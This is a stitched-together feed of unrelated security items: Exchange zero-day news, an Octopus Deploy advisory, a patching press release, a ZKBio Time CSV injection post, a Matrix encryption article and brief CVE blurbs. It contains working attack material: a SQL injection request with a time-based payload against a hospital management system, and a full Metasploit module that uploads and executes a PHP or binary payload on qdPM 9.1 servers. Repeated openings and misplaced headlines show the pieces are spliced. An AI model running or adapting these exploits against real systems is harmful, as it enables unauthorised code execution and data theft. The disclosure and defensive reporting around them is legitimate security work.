Security researchers are warning of previously undisclosed flaws in fully patched Microsoft Exchange servers being exploited by malicious actors in real-world attacks to achieve remote code execution on affected systems.
That's according to Vietnamese cybersecurity company GTSC, which discovered the shortcomings as part of its security monitoring and incident response efforts in August 2022.
The

Security researchers are warning of previously undisclosed flaws in fully patched Microsoft Exchange servers being exploited by malicious actors in real-world attacks to achieve remote code execution on affected systems.

That's according to Vietnamese cybersecurity company GTSC, which discovered the shortcomings as part of its security monitoring and incident response efforts in August 2022.

The two vulnerabilities, which are formally yet to be assigned CVE identifiers, are being tracked by the Zero Day Initiative as **ZDI-CAN-18333** (CVSS score: 8.8) and **ZDI-CAN-18802** (CVSS score: 6.3).

GTSC said that successful exploitation of the flaws could be abused to gain a foothold in the victim's systems, enabling adversaries to drop web shells and carry out lateral movements across the compromised network.

"We detected webshells, mostly obfuscated, being dropped to Exchange servers," the company noted. "Using the user-agent, we detected that the attacker uses Antsword, an active Chinese-based open source cross-platform website administration tool that supports web shell management."

Exploitation requests in IIS logs are said to appear in the same format as the https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html Exchange Server vulnerabilities, with GTSC noting that the targeted servers had already been patched against the flaws that came to light in March 2021.

The cybersecurity company theorized that the attacks are likely originating from a Chinese hacking group owing to the web shell's encoding in simplified Chinese (Windows Code page 936).

Also deployed in the attacks is the China Chopper web shell, a lightweight backdoor that can grant persistent remote access and allow attackers to reconnect at any time for further exploitation.

It's worth noting that the China Chopper web shell was also deployed by Hafnium, a suspected state-sponsored group operating out of China, when the ProxyShell vulnerabilities were subjected to widespread exploitation last year.

Further post-exploitation activities observed by GTSC involve the injection of malicious DLLs into memory, drop and execute additional payloads on the infected servers using the WMI command-line (WMIC) utility.

The company said at least more than one organization has been the victim of an attack campaign leveraging the zero-day flaws. Additional details about the bugs have been withheld in light of active exploitation.

We have reached out to Microsoft for further comment, and we will update the story if we hear back.

In the interim, as temporary workarounds, it's recommended to add a rule to block requests with indicators of compromise using the URL Rewrite Rule module for IIS servers -

*   In Autodiscover at FrontEnd, select tab URL Rewrite, and then select Request Blocking
*   Add string ".\*autodiscover\\.json.\*\\@.\*Powershell.\*" to the URL Path, and
*   Condition input: Choose {REQUEST\_URI}

"I can confirm significant numbers of Exchange servers have been backdoored - including a honeypot," Security researcher Kevin Beaumont said in a series of tweets, adding, "it looks like a variant of proxying to the admin interface again."

"If you don't run Microsoft Exchange on premise, and don't have Outlook Web App facing the internet, you are not impacted," Beaumont said.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

WARNING: New Unpatched Microsoft Exchange Zero-Day Under Active Exploitation

In affected versions of Octopus Deploy it is possible to bypass rate limiting on login using null bytes.

Summary

Login password rate limit can be bypassed with null bytes (CVE-2022-2778)

Advisory Number

2022-15

Discovery Date

11 Aug 2022

Patch Release Date

09 Sep 2022

Advisory Release Date

27 Sep 2022

Product

Octopus Server

Operating System

Linux and Microsoft Windows

Severity

Low

CVE ID

CVE-2022-2778

Customers who have downloaded and installed any of the Octopus Server versions listed below ("Details") are affected.

Please upgrade your Octopus Server immediately to fix this vulnerability.

Customers who have upgraded Octopus Server to version 2022.3.10405 or higher are not affected.

**Severity**

Octopus Deploy has given this vulnerability a low rating. This rating was given according to the Octopus Deploy severity levels, which ranks vulnerabilities as critical, high, medium, or low severity.

This is our assessment and you should evaluate its applicability to your own environment.

**Details**

In affected versions of Octopus Deploy it is possible to bypass rate limiting on login using null bytes.

The versions of Octopus Server affected by this vulnerability are:

*   All 3.x.x, 4.x.x versions
*   All 2018.x, 2019.x, 2020.x versions
*   All 2021.x, 2022.1.x versions
*   All 2022.2.x versions before 2022.2.8277
*   All 2022.3.x versions before 2022.3.10405
*   All 2022.4.x versions before 2022.4.1371

As of the 27/09/2022 Octopus Server version 2022.4.x is only available on Octopus Cloud.

**Fix**

To address this vulnerability, we have released Octopus Server version:

*   2022.2.8277
*   2022.3.10405
*   2022.4.1371

The latest versions of Octopus Deploy products can be downloaded from https://octopus.com/downloads and previous versions can be downloaded from https://octopus.com/downloads/previous

**What You Need to Do**

Octopus Deploy recommends that you upgrade to the latest version (2022.3.10405). You can download the latest version of Octopus Server from https://octopus.com/downloads

**If you can't upgrade to the latest version (2022.3.10405):**

If you have feature version...

...then upgrade to this version

3.x.x, 4.x.x

2022.2.8277 or greater

2018.x, 2019.x, 2020.x, 2021.x, 2022.1.x

2022.2.8277 or greater

2022.2.x

2022.2.8277 or greater

2022.3.x

2022.3.10405 or greater

2022.4.x

2022.4.1371 or greater

**Mitigation**

There is no known mitigation for CVE-2022-2778, it is important to upgrade to a fixed version as soon as possible.

**Support**

If you have any questions or concerns regarding this advisory, please contact our support team https://octopus.com/support.

**Exploitation and Public Announcements**

The Octopus Deploy security team is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.

**Source**

This vulnerability was found by Justin Steven

CVE-2022-2778: Security Advisory 2022-15

Expedited software patching and updating recognized as one of the most important processes to protect against system compromise from cyberattacks.

South Bend, IN (September 27, 2022) – Aunalytics, a leading data management and analytics company delivering managed IT and data platform services for mid-sized and enterprise businesses, today initiated its Security Patching Platform, Co-managed Patching as a Service to complement the company’s Advanced Security solution suite. Windows OS and supported 3rd party patch management allow for tighter security in the defense against cyberattacks and the new offering ensures active remediation.

According to a 2022 Data Breach Investigations Report by Verizon, around 70 percent of successful cyberattacks exploited known vulnerabilities with available patches, making it important to update operating systems and applications regularly to prevent such attacks. Now, Aunalytics’ new technology as a service includes the tools, structure, strategy and intelligence for managing patch deployment and is a complete solution with best practices, templates, libraries, and built-in alert thresholds.

Lack of security patching leads to vulnerabilities within an organization’s information systems, internal controls, or system processes, which can then be exploited by cybercriminals. Using a collection of tools, cyber attackers use the vulnerability to gain unauthorized access to corporate systems and data. Identifying and resolving vulnerabilities is very important since a successful exploit can lead to a full-scale system breach.

Workstation and server application patching ensures that organizations have baseline protection against the latest security vulnerabilities, preventing such attacks before they occur. However, patching can be difficult to manage and update in real-time as software fixes are published on an ongoing basis. Setting up and coordinating manual patching across an organization can be extremely cumbersome, taking days to organize, schedule, and execute across an entire company.

McKinsey cites good patch management as a top proactive maintenance measure that can help organizations prevent cyberattacks. However, knowing the priority level for patch installment can be confusing and lead to poor patch management as a result. Enlisting the help of a partner to employ security patching best-practices can add true value to many organizations. Aunalytics patch detection, download, and installment methods are developed considering each client's security and uptime requirements and prioritized in order of threat potential. Aunalytics’ experienced security patching team proactively monitors for updates, eliminating worry for end users and server administrators.

As part of the new service, users gain access to comprehensive security solutions with customized alerting and vulnerability prioritization, leveraging proprietary solutions and processes. The platform facilitates collaboration between IT and security teams and includes the following capabilities:

• Inventory and performance management and proactive alerting  
• Patch deployment control strategy, prioritization, planning  
• Patch vetting and blacklisting intelligence  
• Windows Operating System patch management  
• Supported 3rd Party Patch Management  
• Anti-Malware  
• DNS-based Malware Protection  
• Device Encryption Management  
• Innovative management tool library

“Security patch exploits can have extremely damaging effects on an organization, decreasing revenues or causing reputational damage, making it imperative to have security patching in place,” said Chris Nicholson, Vice President of Managed IT Services. “Aunalytics’ Security Patching Platform services allow for the rapid resolution of these concerns to maintain the highest levels of cyber-resiliency.”

**About Aunalytics**  
Aunalytics is a leading data management and analytics company delivering Insights-as-a-Service for mid-sized businesses and enterprises. Selected for the prestigious Inc. 5000 list for two consecutive years as one of the nation’s fastest growing companies, Aunalytics offers managed IT services and managed analytics services, private cloud services, and a private cloud-native data platform for data management and analytics. The platform is built for universal data access, advanced analytics and AI -- unifying distributed data silos into a single source of truth for highly accurate, actionable business information. Its DaybreakTM industry intelligent data mart combined with the power of the Aunalytics data platform provides industry-specific data models with built-in queries and AI for accurate mission-critical insights. To solve the talent gap that so many mid-sized businesses and enterprises located in secondary markets face, through its side-by-side digital transformation model, Aunalytics provides the technical talent needed for data management and analytics success in addition to its innovative technologies and tools. To learn more contact us at +1 855-799-DATA or visit Aunalytics at http://www.aunalytics.com or on Twitter and LinkedIn.

Aunalytics Launches Security Patching Platform as a Service

ZKTeco Xiamen Information Technology ZKBio Time 8.0.7 Build: 20220721.14829 was discovered to contain a CSV injection vulnerability. This vulnerability allows attackers to execute arbitrary code via a crafted payload injected into the Content text field of the Add New Message module.

**ZKBio Time - CSV Injection**

 Hi all,

I am here with new post. Recently I have identified a csv injection vulnerability in one of the web-based time and attendance management software. Below are the details:

**Software Description:**

ZKBio Time is a powerful web-based time and attendance management software. With a powerful data handling capacity, the system can manage the attendance data of 10,000 employees. It can easily handle hundreds of devices and thousands of employees and their transactions. ZKBio Time comes with an intuitive user interface is able to manage timetable, shift and schedule and can easily generate attendance reports.

**Impacted Version: 8.0.7 (Build: 20220721.14829) and before.**

**Vulnerability details:**

1.  Login to ZKBio Time Application
2.  In the left Menu click on Messages -> Public
3.  Click on ADD new message button
4.  Write your Device Serial Number
5.  Mention any date/time and duration
6.  In Content Field Add your CSV injection payload.
7.  As shown below
    
      
    
8.  Any user who extract the report in CSV format and opens it
9.    
    
10.  The embedded payload will be executed

There is 90% chance that user will ignore the below warning box as the report is downloaded from trusted source. This will lead to payload execution.

**Thanks**

**Popular posts from this blog**

**Add Background Image on your USB/Flash Drive/Any System drive.**

How to set a Background Image on your Pendrive: 1.Select an image on your computer which you want to appear as background image. 2.Rename that image to "Image" without quotes. 3.Now copy and paste the image to your Pendrive. 4.Now create a new notepad file in ur Pendrive and paste the following code in it. \[ExtShellFolder Views\] {BE098140-A513-11D0-A3A4-00C04FD706EC}= {BE098140-A513-11D0-A3A4-00C04FD706EC} \[{BE098140-A513-11D0-A3A4-00C04FD706EC}\] IconArea\_Image= Image.jpg (check the file type of image. if its .jpg or .png or .bmp etc) 5.Save the file as desktop.ini in your pendrive and change the save as type to all files. 6.Remove your Pendrive and Enter Again and Open it. Note: This trick works best on Windows Xp and Vista . Wallpaper could also be set in any other directory like C:, D:, E: etc. Just copy and paste the files in the directory where you want the wallpaper to appear.

**Ericsson BSCS iX R18 Billing & Rating (ADMX, MX) - Stored XSS**

Dear Reader, I was able to identify stored XSS in multiple web base modules of Ericsson BSCS iX R18 Billing & Rating platform  Below are its details: # Software description: Ericsson Billing is a convergent billing solution for telecoms that combines an unrivaled combination of out-of-the box features and high configurability. As an evolution of the widely-installed Ericsson BSCS iX, Ericsson Billing provides a low-risk but effective route to capture and secure revenue streams and take advantage of business opportunities from both traditional telecom services as well as digital services, 5G and IoT. # Technical Details & Impact: There are multiple web base modules in BSCS iX e.g. ADMX, MX (monitoring center), CX etc. It was observed that ADMX and MX are vulnerable to stored XSS, In most test cases session hijacking was also possible by utilizing the XSS vulnerability. This potentially allows for full account takeover, or exploiting admin's browsers using beef

**Autoconfiguration ipv4 address 196.254.x.x IP Problem**

Today when i connect my laptop to Lan it wasn't getting the ip from my DHCP server. Instead it gives me some weird IP like 196.254.x.x . while my Wifi was working fine, I searched Alot to get to know until i found a great piece of code on a blog. so going to share with you guys. Problem with my Ip. Steps to follow: If you are Using any Firewall disable it (like i use comodo so i disable it temporary) Click on start and click on RUN (or simple press windowsKey+R ) type CMD   Now type the below Codes  netsh interface ipv4 show inter It will show like this.  As we have problem in LAN so my LAN here is Local Area Connection  and Its Idx=11 (we will use this idx number in next code) Now type in this code and replace your Idx number, as mine is 11    netsh interface ipv4 set interface 11 dadtransmits=0 store=persistent   It will show like this.  If it says OK. Congratulations you have done the difficult part Now Click on Start and Run again and Type Servic

CVE-2022-40472: ZKBio Time - CSV Injection

hms-staff.php in Projectworlds Hospital Management System Mini-Project through 2018-06-17 allows SQL injection via the type parameter.

Hi

I found a SQL injection vulnerability in your hospital management system.

**Page Request:-**

    POST /hospital/hms-staff.php HTTP/1.1
    Host: 192.168.0.107
    Content-Length: 43
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Cookie: PHPSESSID=t8e8smm8d836b7lar1qb6l3avf
    Connection: close
    
    email=username&password=password&type=admin+WHERE+1=1+AND+SLEEP(10)--+-
    

**The above query will only sleep the database for 10 seconds. Since it's a blind boolean-based injection, an attacker can dump all the databases using the substr()method or using the SQLMAP  tool.**

**Affect URL: http://127.0.0.1/hms-staff.php****Afftect Parameter:  type****Payload: admin+WHERE+1=1+AND+SLEEP(10)--+-****Mitigation:**

*   Performing Whitelist Input Validation
*   Use of Prepared Statements (with Parameterized Queries)

CVE-2022-33880: Vulnerability/BUG - Unauthenticated bind boolean based sql injection via type parameter on hms-staff.php page · Issue #7 · projectworldsofficial/hospital-management-system-in-php

The messenger protocol had gained popularity for its robust security, but vulnerabilities allowed attackers to decrypt messages and impersonate users.

Developers of the open source Matrix messenger protocol have released an update to fix critical end-to-end encryption vulnerabilities that subvert the confidentiality and authentication guarantees that have been key to the platform’s meteoric rise.

Matrix is a sprawling ecosystem of open source and proprietary chat and collaboration clients and servers that are fully interoperable. The best-known app in this family is Element, a chat client for Windows, macOS, iOS, and Android, but there’s a dizzying array of other members as well.

Matrix roughly aims to do for real-time communication what the SMTP standard does for email, which is to provide a federated protocol allowing user clients connected to different servers to exchange messages with each other. Unlike SMTP, however, Matrix offers robust end-to-end encryption, or E2EE, designed to ensure that messages can’t be spoofed and that only the senders and receivers of messages can read the contents.

Matthew Hodgson—the cofounder and project lead for Matrix and the CEO and CTO at Element, maker of the flagship Element app—said in an email that conservative estimates are that there are about 69 million Matrix accounts spread throughout some 100,000 servers. The company currently sees about 2.5 million monthly active users using its Matrix.org server, though he said this is also likely an underestimate. Among the hundreds of organizations announcing plans to build internal messaging systems based on Matrix are Mozilla, KDE, and the governments of France and Germany.

On Wednesday, a team published research that reports a host of vulnerabilities that undermine Matrix’s authentication and confidentiality guarantees. All of the attacks described by the researchers require the aid of a malicious or compromised homeserver that targets the users who connect to it. In some cases, there are ways for experienced users to detect that an attack is underway.

The researchers privately reported the vulnerabilities to Matrix earlier this year and agreed to a coordinated disclosure timed to Wednesday’s release by Matrix of updates that address the most serious flaws.

“Our attacks allow a malicious server operator or someone who gains control of a Matrix server to read the messages of users and to impersonate them to each other,” the researchers wrote in an email. “Matrix aims to protect against such behavior by providing end-to-end encryption, but our attacks highlight flaws in its protocol design and its flagship client implementation Element.”

Hodgson said he disagrees with the researchers’ contention that some of the vulnerabilities reside in the Matrix protocol itself and asserts they are all implementation bugs in the first generation of Matrix apps, which include Element. He said that a newer generation of Matrix apps, including ElementX, Hydrogen, and Third Room, are unaffected. There are no indications that the vulnerabilities have ever been actively exploited, he added.

Breaking Confidentiality, Attacking Verification, and More

The first two attacks provide a simple confidentiality break by exploiting the homeserver’s control over the users and devices that are permitted to join a private room. Only a person who creates a room or is deputized by the room creator is permitted to invite and admit new members, but the room management messages that make this mechanism possible aren’t required to be authenticated with the cryptographic keys of these authorized users. It’s trivial for someone with control of the homeserver to spoof such messages and, from there, admit users without the permission of the authorized users. Once admitted, the attacker gains access to decrypted communications sent in that room.

The researchers are careful to note that all new room entrants are automatically logged in an event timeline and hence can be detected by anyone in the room who manually inspects the membership list in real time. In large rooms with lots of activity, however, this kind of inspection may not be practical, the researchers said.

A variation of this attack is for the homeserver to add a device under the attacker’s control to the account of a user already in a private room. In a case like this, the new device will be displayed and labeled as “unverified” to all users, but at that point, all existing devices will automatically share the keys needed to decrypt all future messages.

A third proof-of-concept exploit provides an attack on the out-of-band mechanism Element offers so users can verify that the cryptographic identity they’re communicating with matches the person they think it does. This verification allows users or devices to compare short authentication strings to make sure they match, in much the way that the Signal messenger uses safety numbers. In either case, users perform the comparison outside of the app.

The researchers wrote:

_Our attack against out-of-band verification in Matrix enables an attacker to convince a target to cryptographically sign (and thus verify) a cross-signing identity controlled by the attacker. In this attack, a malicious homeserver assigns each device a device identifier that is also a valid cryptographic identity (under the homeserver’s control). At the end of the out-of-band verification process, each device will send a homeserver-controlled cryptographic identity to the other device. They do this by assigning the target device a device identifier that is also a cryptographic identity, exploiting a lack of domain separation between the two. When a device receives such a message, it is interpreted as a cryptographic identity. The receiving device will then sign (and thus verify) a homeserver-controlled cryptographic identity, with the false understanding that they have verified this identity out-of-band!_

With that, the attacker can perform a mallory-in-the-middle attack that breaks the confidentiality and authenticity of an underlying “Olm” channel, which under the Matrix design is the protocol for transmitting end-to-end data sent between two chat partners.

A fourth attack provides for what the researchers call “semi-trusted impersonation.” At times—such as when a user adds a new device to their account—a Matrix device may not have access to inbound messages in so-called Megolm sessions, as they’re known in the Matrix specification. This can prevent the device from being able to decrypt messages sent before it was added. The device can recover by using a key request to obtain the needed decryption keys.

Matrix, the researchers said, doesn’t provide a cryptographic mechanism for ensuring that the keys shared through the key request are legitimate. Instead, the Matrix specification requires sharing of inbound messages to be completed only between devices that trust each other. When this occurs, Matrix generates a warning message to messages that were decrypted using a forwarded key.

The researchers continued:

_Whilst Element clients restrict who they share keys with, no verification is implemented on who to accept key shares from. Our attack exploits this lack of verification in order to send attacker-controlled Megolm sessions to a target device, claiming they belong to a session of the device they wish to impersonate. The attacker can then send messages to the target device using these sessions, which will authenticate the messages as coming from the device being impersonated. Whilst these messages will be accompanied by a warning, this is the same warning that accompanies keys \*honestly\* forwarded with the “Key Request protocol.”_

The fifth and sixth attacks are what the researchers call trusted impersonation and impersonation to confidentiality break. Each builds off the other to enable a server to impersonate users and read their messages. A seventh attack works against a backup feature and is only of theoretical interest because the researchers can’t instantiate an attack exploiting it against a real Matrix server.

Agreeing to Disagree

In his email, Hodgson said Matrix regards only three of the vulnerabilities—the trusted impersonation, the attack on key verification, and the malicious backup attack—as critical security issues. And even then, he said all three are flaws in how Matrix was implemented in its first-generation client software developer kit, known as matrix-js-sdk. He added:

_They have highlighted two issues with the protocol which are much lower severity: that homeservers can currently add malicious users and devices to conversations that they are hosting, and that homeservers can fake history which users did not directly receive at the time. However, users are clearly warned when these situations occur: if you have verified the users in a conversation and an unverified user or device is added to a conversation, it is very clearly marked in all Matrix clients with a big red warning cross. Similarly, if an unexpected user suddenly appears in a conversation, everyone in the room is immediately informed that this user has joined, and can take appropriate evasive action._

_By confusing the legitimate implementation bugs which only affect matrix-js-sdk and derivatives with these lower severity protocol design considerations, the researchers have artificially inflated the overall severity of the problem, by falsely implying that the protocol itself is vulnerable._

_This said, we are also addressing these protocol design issues—we’ve already eliminated most situations where the server could fake history in tomorrow’s release, and we’ll be following up with an update which cryptographically ensures that users/devices can only be added to a room if they were invited by an admin in the room. We are also shifting to “trust on first use,” so that any unexpected devices/users get flagged, whether or not you’ve verified the users in a room._

Besides disagreeing on some of the specific vulnerabilities, the researchers and Hodgson remain at odds on another point. The researchers said the vulnerabilities they uncovered “highlight a lack of a unified and formal approach to security guarantees in Matrix” and that the specification has grown “organically with new sub-protocols adding new functionalities and thus inadvertently subverting the security guarantees of the core protocol.”

For his part, Hodgson said:

_We consider the protocol itself to be sound, and we consider our security processes to be robust. We agree that the first generation implementations have grown organically (they predated the formal protocol specification), and the fact is that we have been focusing our efforts on auditing our next generation implementations which we will be switching over to in the coming months. We have 4 independent public audits booked in with Least Authority, one of which is already published:_ _https://matrix.org/blog/2022/05/16/independent-public-audit-of-vodozemac-a-native-rust-reference-implementation-of-matrix-end-to-end-encryption__, and it’s worth reiterating that the next gen implementations were not susceptable\[sic\] to these attacks. It’s obviously unfortunate that we didn’t catch the first gen SDK vulns in an existing audit (the bugs occurred since our original 2016 NCC Group audit), but going forwards our reference implementations will all be independently verified. Unfortunately we didn’t have resources to audit both the legacy and next-gen implementations recently, and so focused on the next-gen \[implementations\], knowing they will shortly obsolete the legacy \[implementations\]._

The research paper, _Practically-exploitable Cryptographic Vulnerabilities in Matrix_, was authored by Martin R. Albrecht, Sofía Celi, Benjamin Dowling, and Daniel Jones. Albrecht and Jones are with the Information Security Group at the Royal Holloway University of London; Celi is with Brave Software; and Dowling is with the Security of Advanced Systems Group, University of Sheffield.

Putting It All Together

The researchers and Hodgson disagree on some key points, but there’s an important consensus that has led to changes that once again restore the confidentiality and authentication guarantees of Matrix, even in the case of a malicious or compromised homeserver. But for users to avail themselves of these assurances, the researchers said:

_Each user must enable “cross-signing” and perform out-of-band verification with each of their own devices, and with each user they interact with. They must then remain vigilant: any warning messages or icons must be spotted and investigated. In the Element user interface, this requires checking the room icon and each individual message they receive (in some cases, past messages can retroactively receive a warning). Note that such warnings could be expected behavior (for example if the message was decrypted using a server-side Megolm backup or through the “Key Request protocol”). Users would need the expertise to investigate these warnings thoroughly and, if an issue is found, recover from it. If you follow these instructions without fail, Matrix can provide you with confidentiality and authentication._

_This places an unnecessary burden on users of Matrix clients, limits the user base to those with an understanding of the cryptography used in Matrix and how it is applied, and is impractical for daily use. The burden this places on users is unnecessary and the result of the design flaws we highlight in our paper (this is our “Simple confidentiality break”/“Homeserver Control of Room Membership” attack). Whilst this issue will persist after today’s fixes, a remediation is planned by the Matrix developers for a later date. It is understandable that they have delayed the release of this remediation, since it requires sizable changes to the protocol._

Besides updating Element, people will also want to install patches for Beeper, Cinny, SchildiChat, Circuli, Synod.im, and any other clients based on matrix-js-sdk, matrix-ios-sdk, or matrix-android-sdk2. It’s important to install the fixes first and only then perform the verification with new devices.

_This story originally appeared on_ _Ars Technica__._

_Update 9-29-22, 4:30 pm ET: Updated to clarify that the patch has already been released._

A Matrix Update Patches Serious End-to-End Encryption Flaws

A remote code execution vulnerability exists in qdPM versions 9.1 and below. An attacker can upload a malicious PHP code file via the profile photo functionality by leveraging a path traversal vulnerability in the users['photop_preview'] delete photo feature thus allowing bypass of .htaccess protection. NOTE: this issue exists because of an incomplete fix for CVE-2015-3884.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::EXE  include Msf::Exploit::PhpEXE  include Msf::Exploit::FileDropper  def initialize(info = {})    super(      update_info(        info,        'Name' => 'qdPM 9.1 Authenticated Arbitrary PHP File Upload (RCE)',        'Description' => %q{          A remote code execution (RCE) vulnerability exists in qdPM 9.1 and earlier.          An attacker can upload a malicious PHP code file via the profile photo functionality, by leveraging a path traversal          vulnerability in the users['photop_preview'] delete photo feature, allowing bypass of .htaccess protection.          NOTE: this issue exists because of an incomplete fix for CVE-2015-3884.        },        'License' => MSF_LICENSE,        'Author' => [          'Rishal Dwivedi (Loginsoft)', # Discovery          'Leon Trappett (thepcn3rd)', # PoC          'Giacomo Casoni' # Metasploit        ],        'References' => [          ['CVE', '2020-7246'],          ['EDB', '50175']        ],        'Payload' => {          'BadChars' => "\x00"        },        'DefaultOptions' => {          'EXITFUNC' => 'thread'        },        'Platform' => %w[linux php],        'Targets' => [          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ],          [ 'Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ],          [ 'Windows x86', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ],          [ 'Windows x64', { 'Arch' => ARCH_X64, 'Platform' => 'win' } ]        ],        'Privileged' => true,        'DisclosureDate' => '2020-11-21',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => ['CRASH_SAFE'],          'Reliability' => ['IOC_IN_LOGS'],          'SideEffects' => ['REPEATABLE_SESSION']        }      )    )    register_options(      [        OptString.new('TARGETURI', [true, 'The base directory where qdPM resides', '/']),        OptString.new('EMAIL', [true, 'The email to login with']),        OptString.new('PASSWORD', [true, 'The password to login with'])      ]    )    self.needs_cleanup = true  end  def check    uri = normalize_uri(uri, '/index.php')    res = send_request_raw({ 'uri' => uri })    if res.nil?      return Exploit::CheckCode::Unknown    end    login_page = res.get_html_document    begin      version_num = login_page.at('div[@class="copyright"]').at('a').text.tr('qdPM ', '').to_f    rescue StandardError      return Exploit::CheckCode::Unknown    end    version = Rex::Version.new(version_num)    if version <= Rex::Version.new('9.1')      return Exploit::CheckCode::Appears    else      return Exploit::CheckCode::Safe    end  end  def get_write_exec_payload_win(fname, _data)    p = Rex::Text.encode_base64(generate_payload_exe)    php = %|    <?php    $f = fopen("#{fname}", "wb");    fwrite($f, base64_decode("#{p}"));    fclose($f);    exec("C:\\Windows\\System32\\cmd.exe /c #{fname}");    ?>    |    php = php.gsub(/^ {4}/, '').gsub(/\n/, ' ')    return php  end  def login(base, username, password)    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri("#{base}/index.php/login"),      'keep_cookies' => true    })    login_page = res.get_html_document    csrf_token = login_page.at("input[name='login[_csrf_token]']/@value")    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri("#{base}/index.php/login"),      'vars_post' => {        'login[email]' => username,        'login[password]' => password,        'login[_csrf_token]' => csrf_token      },      'keep_cookies' => true,      'headers' => {        'Origin' => "http://#{rhost}",        'Referer' => "http://#{rhost}/#{base}/index.php/login"      }    })    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri("#{base}/index.php/myAccount"),      'keep_cookies' => true,      'headers' => {        'Host' => rhost.to_s      }    })    account_page = res.get_html_document    begin      userid = account_page.at("input[@name='users[id]']/@value").text.strip    rescue StandardError      print_error('The designated admin account does not have a user ID.')      return {}    end    username = account_page.at("input[@name='users[name]']/@value").text.strip    csrftoken_ = account_page.at("input[@name='users[_csrf_token]']/@value").text.strip    opts = {      'user_id' => userid,      'name' => username,      'csrf_token' => csrftoken_    }    return opts  end  def upload_php(base, opts)    fname = opts['filename']    php_payload = opts['data']    user_id = opts['user_id']    email = opts['email']    csrf_token = opts['csrf_token']    data = [      { 'name' => 'sf_method', 'data' => 'put' },      { 'name' => 'users[id]', 'data' => user_id },      { 'name' => 'users[photo_preview]', 'data' => '.htaccess' },      { 'name' => 'users[_csrf_token]', 'data' => csrf_token },      { 'name' => 'users[new_password]', 'data' => '' },      { 'name' => 'users[email]', 'data' => email },      { 'name' => 'extra_fields[9]', 'data' => '' },      { 'name' => 'users[remove_photo]', 'data' => '1' }    ]    send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri("#{base}/index.php/myAccount/update"),      'vars_form_data' => data,      'keep_cookies' => true,      'headers' => {        'Origin' => "http://#{rhost}",        'Referer' => "http://#{rhost}#{base}/index.php/home/myAccount"      }    )    data = [      { 'name' => 'sf_method', 'data' => 'put' },      { 'name' => 'users[id]', 'data' => user_id },      { 'name' => 'users[photo_preview]', 'data' => '../.htaccess' },      { 'name' => 'users[_csrf_token]', 'data' => csrf_token },      { 'name' => 'users[new_password]', 'data' => '' },      { 'name' => 'users[email]', 'data' => email },      { 'name' => 'extra_fields[9]', 'data' => '' },      { 'name' => 'users[remove_photo]', 'data' => '1' }    ]    send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri("#{base}/index.php/myAccount/update"),      'vars_form_data' => data,      'keep_cookies' => true,      'headers' => {        'Origin' => "http://#{rhost}",        'Referer' => "http://#{rhost}#{base}/index.php/home/myAccount"      }    )    data = [      { 'name' => 'sf_method', 'data' => 'put' },      { 'name' => 'users[id]', 'data' => user_id },      { 'name' => 'users[_csrf_token]', 'data' => csrf_token },      { 'name' => 'users[new_password]', 'data' => '' },      { 'name' => 'users[email]', 'data' => email },      { 'name' => 'extra_fields[9]', 'data' => '' },      { 'name' => 'users[remove_photo]', 'data' => '1' },      { 'name' => 'users[photo]', 'data' => php_payload, 'mime_type' => 'application/octet-stream', 'filename' => fname }    ]    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri("#{base}/index.php/myAccount/update"),      'vars_form_data' => data,      'keep_cookies' => true,      'headers' => {        'Origin' => "http://#{rhost}",        'Referer' => "http://#{rhost}#{base}/index.php/home/myAccount"      }    })    return res.code == 302  end  def exec_php(base, _opts)    res = send_request_cgi({      'uri' => normalize_uri("#{base}/index.php/myAccount"),      'keep_cookies' => true    })    home_page = res.get_html_document    backdoor = home_page.at("//input[@name='users[photo_preview]']/@value").text.strip    register_file_for_cleanup(backdoor)    send_request_cgi({      'uri' => normalize_uri("#{base}/uploads/users/#{backdoor}")    })  end  def exploit    uri = normalize_uri(target_uri.path)    user = datastore['EMAIL']    pass = datastore['PASSWORD']    print_status("Attempt to login with '#{user}:#{pass}'")    opts = login(uri, user, pass)    if opts.empty?      print_error('Login unsuccessful or bad (admin) user')      return    end    php_fname = "#{Rex::Text.rand_text_alpha(5)}.php"    case target['Platform']    when 'php'      p = get_write_exec_payload    when 'linux'      p = get_write_exec_payload(unlink_self: true)    when 'win'      bin_name = "#{Rex::Text.rand_text_alpha(5)}.bin"      bin = generate_payload_exe      p = get_write_exec_payload_win(bin_name.to_s, bin)      print_warning("#{bin_name} will require manual cleanup")    end    print_status("Uploading PHP payload (#{p.length} bytes)...")    data = {      'email' => user.to_s,      'filename' => php_fname,      'data' => p    }    data = data.merge(opts)    uploader = upload_php(uri, data)    if !uploader      print_error('Unable to upload')      return    end    print_status("Executing '#{php_fname}'")    exec_php(uri, opts)  endend

qdPM 9.1 Authenticated Shell Upload

Bus Pass Management System version 1.0 suffers from a cross site scripting vulnerability.

